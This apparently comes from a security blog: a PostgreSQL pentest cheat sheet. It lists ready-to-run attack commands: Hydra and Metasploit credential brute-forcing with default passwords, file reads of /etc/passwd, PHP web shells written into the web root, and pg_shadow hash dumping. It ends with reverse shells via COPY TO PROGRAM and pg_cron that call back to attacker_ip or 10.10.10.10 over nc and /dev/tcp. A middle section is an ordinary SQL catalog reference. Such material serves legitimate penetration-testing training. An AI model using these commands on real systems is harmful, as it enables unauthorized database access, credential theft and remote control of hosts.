Postgres Pentest Cheatsheet - Port 5432

February 14, 2025 


nmap -sC -sV --script vuln,vulners --script-args mincvss=7.0 -p5432,5433 -Pn 10.10.10.10 
 #make sure to check for vulnerable versions
Bruteforcing Postgres Creds

#Using Metasploit
use auxiliary/scanner/postgres/postgres_login

#using Hydra
hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt 10.10.10.10 postgres

Default Username & Passwords:
● postgres : postgres
● postgres : password
● postgres : admin
● admin : admin
● admin : password
  root : root

#or for a better wordlist 
cp /usr/share/wordlists/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt .
cat postgres-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat postgres-betterdefaultpasslist.txt  | cut -f2 -d":" > pass.txt

Accessing remote Postgresql server

psql -h 10.10.10.10 -U USERNAME
psql -h <host> -U <username> -d <database>

PrivEsc when Postgresql Is Running As Root

psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr  //Enter Password later 

\dt    \\List Tables
\dp     \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case) 

Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs

or 
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');

Reading files via Postgres
use auxiliary/admin/postgres/postgres_readfile

#Downloading a file 
> create table new(file TEXT);
COPY new FROM '/etc/passwd';
select * from hack;

#Read a file 
COPY pg_catalog.pg_user TO '/tmp/outfile' WITH CSV;
SELECT pg_read_file('/etc/passwd', 0, 1000);

#Write a file 
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';

#Uploading a file
create table new(put TEXT);
INSERT INTO new(put) VALUES('<?php @system("$_GET[cmd]");?>');
COPY new(put) TO '/tmp/temp.php';

#If large objects (LO) are enabled - use it to exec a script
SELECT lo_export(12345, '/tmp/evil_script.sh');

Dumping Hashes

auxiliary/admin/postgres/postgres_sql
>select usename, passwd from pg_shadow;

auxiliary/scanner/postgres/postgres_hashdump

Postgres Commands 

#Login to Postgres 
psql -h localhost -U Username -d DB_Name

#List all databases
\l
SELECT datname FROM pg_database;

#Check the current database
SELECT current_database();

#Connect to a specific database
\c database_name

#List all schemas
\dn
SELECT schema name FROM information_schema.schemata;

#List all tables in a specific schema
SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';

#List all tables in the current database
\dt
SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';
SELECT tablename FROM pg_tables;

#List tables owned by the current user
SELECT tablename FROM pg_tables WHERE tableowner = current_user;

#List columns of a specific table
\d table_name
SELECT column_name, data_type FROM information_schema.columns WHERE table_name = 'table_name';

#List all columns in the database
SELECT table_name, column_name FROM information_schema.columns;

#List all users/roles
\du
SELECT usename FROM pg_user;

#Check the current user
SELECT current_user;

#Check privileges of a specific user
SELECT grantee, privilege_type FROM information_schema.role_table_grants WHERE grantee = 'username';

#List indexes for a table
\di
SELECT indexname, indexdef FROM pg_indexes WHERE tablename = 'table_name';

#List constraints on a table
SELECT constraint_name, constraint_type FROM information_schema.table_constraints WHERE table_name = 'table_name';

#List all triggers
SELECT tgname FROM pg_trigger;

#List all functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';

#List all installed extensions
\dx
SELECT * FROM pg_extension;

#Check available extensions
SELECT * FROM pg_available_extensions;

#Read a file
SELECT pg_read_file('/etc/passwd', 0, 2000);

Postgres Reverse Shells

#if postgres has write access to /var/www/html
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
#access it via
http://victim.com/shell.php?cmd=nc -e /bin/sh attacker_ip 4444

#if pg_cron is installed
SELECT cron.schedule('rev_shell', '1 minute', 'bash -c "bash -i >& /dev/tcp/attacker_ip/4444 0>&1"');

#Revshells
COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash 10.10.10.10 9001';
COPY (SELECT '') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"';
COPY (SELECT '') TO PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10. 9001 >/tmp/f';
COPY (SELECT pg_backend_pid()) TO PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.10.10 9001 >/tmp/f';


By:
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment